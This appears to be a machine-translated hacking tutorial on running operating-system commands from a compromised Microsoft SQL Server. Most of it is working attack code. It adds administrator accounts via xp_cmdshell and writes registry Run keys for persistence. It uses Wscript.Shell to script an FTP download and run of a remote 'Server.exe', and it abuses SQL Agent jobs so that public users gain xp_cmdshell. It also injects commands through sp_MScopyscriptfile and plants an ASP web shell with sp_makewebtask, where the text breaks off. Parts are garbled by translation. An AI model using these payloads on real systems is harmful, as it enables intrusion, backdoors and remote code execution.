How to execute commands in MSSQL

Let's say a host has 1433 ports. We have remote connections via SQL injection or null weak password

What can be done to add a system administrator user (or execute a system command)

1). xp_cmdshell ' cmd.exe/c net user aaa Bbb/add '

Everybody knows the way, the biggest benefit is to have the echo, but the most afraid

if exists (SELECT * from dbo.sysobjects WHERE id = object_id (N ' [dbo].[ xp_cmdshell] and OBJECTPROPERTY (ID, N ' isextendedproc ') = 1)

exec sp_dropextendedproc N ' [dbo]. [xp_cmdshell] '

You can delete this extended store by using the T-SQL statement above.

We can usually use

2k:

EXEC sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '

SQL97:

EXEC sp_addextendedproc xp_cmdshell, @dllname = ' Xpsql70.dll '

Was restored.

But some people know that sp_addextendedproc is simply a stored procedure that can be deleted.

Drop PROCEDURE Sp_addextendedproc

if exists (SELECT * FROM

dbo.sysobjects WHERE id = object_id (N ' [dbo].[ xp_cmdshell] ') and

OBJECTPROPERTY (ID, N ' isextendedproc ') = 1)

exec sp_dropextendedproc N ' [dbo]. [xp_cmdshell] '

Restores:

CREATE PROCEDURE sp_addextendedproc---1996/08/30 20:13

@functname nvarchar (517),/* (owner.) Name of function to call/*

@dllname varchar (255)/* Name of DLL containing function */

As

Set Implicit_transactions off

If @ @trancount > 0

Begin

RAISERROR (15002,-1,-1, ' sp_addextendedproc ')

Return (1)

End

/*

* * Create the extended procedure mapping.

*/

DBCC ADDEXTENDEDPROC (@functname, @dllname)

Return (0)--sp_addextendedproc

Yes, it's written so much. There's one simple way to protect it:

First net stop MSSQLServer, then Xplog70.dll (SQL97 under Xpsql70.dll) deleted

Just open the service, okay?

2 Read the above you understand that xp_cmdshell can eventually be deleted, there is no other way?

There are written in the registry three:

Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Softwaremicrosoftwindowscurrentversionrun ', ' czy82 ', ' REG_SZ ', net user Czy Bb/add

In fact, there are several places to write the registry, such as Web browsing settings in the registry

The bad way to write the registry is not only not echo, but not immediately. I don't know.

3)

DECLARE @s int

exec sp_oacreate "Wscript.Shell", @s out

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c Echo Open Asp.7i24.com>c:a.txt"

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo 123321>>c:a.txt"

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo 123321>>c:a.txt"

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c Echo Get Server.exe>>c:a.txt"

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c echo Close>>c:a.txt"

--exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c ftp-s:c:a.txt"

EXEC sp_OAMethod @s, "Run", NULL, "CMD.EXE/C server"

Yes, well, as you can see, we could use sp_OACreate and sp_OAMethod in their role.

Call the system's controls like Fso,wsh,shell or something, but there's a problem that's not as xp_cmdshell

See the results right away, really? Look at the following:

DECLARE @s int,@o int, @f int, @str nvarchar (4000)

/*exec sp_OACreate "Wscript.Shell", @s out

EXEC sp_OAMethod @s, "Run", NULL, "cmd.exe/c net User>c:temp.txt" *

exec sp_oacreate "Scripting.FileSystemObject", @o out

EXEC sp_OAMethod @o, "OpenTextFile", @f out, "C:temp.txt", 1

EXEC sp_OAMethod @f, "ReadAll", @str out

Print @str

The first thing to do is to execute the annotation inside and then execute outside the principle is very simple is to use > to write the results in a file and then use

FSO to read it out! very practical.

4)

Use msdb; --Don't be master here.

exec sp_add_job @job_name = ' czy82 ';

exec sp_add_jobstep @job_name = ' czy82 ', @step_name = ' exec My sql ', @subsystem = ' CmdExec ', @command = ' dir c:>c:b.txt ';

exec sp_add_jobserver @job_name = ' czy82 ', @server_name = ' smscomputer ';

exec sp_start_job @job_name = ' czy82 ';

Job processing with MSSQL can also execute commands and if the subsystem parameters above are TSQL, we can

Execute the TSQL statement.

For the use of these several stored procedures first in @server_name we want to specify your SQL Server name

The SQLServerAgent service of the second system must be opened (the default does not open the irritating bar)

Net start SQLServerAgent

There is another place for this dongdong that can be implemented by public. There's a system hole here, too, look underneath.

Use msdb

EXEC sp_add_job @job_name = ' Getsystemonsql ',

@enabled = 1,

@description = ' This'll give a privileged user Access to

xp_cmdshell ',

@delete_level = 1

EXEC sp_add_jobstep @job_name = ' Getsystemonsql ',

@step_name = ' Exec my sql ',

@subsystem = ' TSQL ',

@command = ' EXEC master. Xp_execresultset N ' select ' ' EXEC

Master.. xp_cmdshell "dir > C:agent-job-results.txt" ', N ' Master '

EXEC sp_add_jobserver @job_name = ' Getsystemonsql ',

@server_name = ' Your SQL Server name '

EXEC sp_start_job @job_name = ' Getsystemonsql '

Do not doubt the above code I was a test success! Here we have to pay attention to xp_execresultset because of it, so.

So that we can execute xp_cmdshell with public.

5 About Microsoft SQL Agent jobs arbitrary files can remove overwrite vulnerabilities (public users can also)

There are articles in Angio: http://www.xfocus.net/vuln/vul_view.PHP?vul_id=2968

Use msdb

EXEC sp_add_job @job_name = ' arbitraryfilecreate ',

@enabled = 1,

@description = ' This'll create a file called C:sqlafc123.txt ',

@delete_level = 1

EXEC sp_add_jobstep @job_name = ' arbitraryfilecreate ',

@step_name = ' Sqla

FC ',

@subsystem = ' TSQL ',

@command = ' Select ' Hello, this file is created by the SQL Agent. '

@output_file_name = ' C:sqlafc123.txt '

EXEC sp_add_jobserver @job_name = ' arbitraryfilecreate ',

@server_name = ' server_name '

EXEC sp_start_job @job_name = ' arbitraryfilecreate '

If subsystem chooses: TSQL has the following contents in the header of the generated file

?? 揂 rbitraryfilecreate?? 1, 揝 QLAFC????? 2003-02-07 18:24:19

----------------------------------------------

Hello, this file is created by the SQL Agent.

(1?????)

So I recommend to generate files best Subsystem Select CmdExec, if used well we can write a have add admin

The command's VBS file to the startup directory!

6 about sp_makewebtask (can write arbitrary content arbitrary file name file)

About Sp_mscopyscriptfile Look at the following example

DECLARE @command varchar (100)

DECLARE @scripfile varchar (200)

Set Concat_null_yields_null off

Select @command = ' dir c: > ' Attackeripsharedir.txt '

Select @scripfile = ' c:autoexec.bat > nul ' | ' + @command + ' | Rd "'

exec sp_mscopyscriptfile @scripfile, '

Both of these things are still being tested.

Let MSSQL public users get a native Web shell:)

sp_makewebtask @outputfile = ' d:smsa.asp ', @charset =gb2312,

--@query = ' SELECT ' '

--@query = ' SELECT ' '

@query = ' SELECT '

"method=" POST ">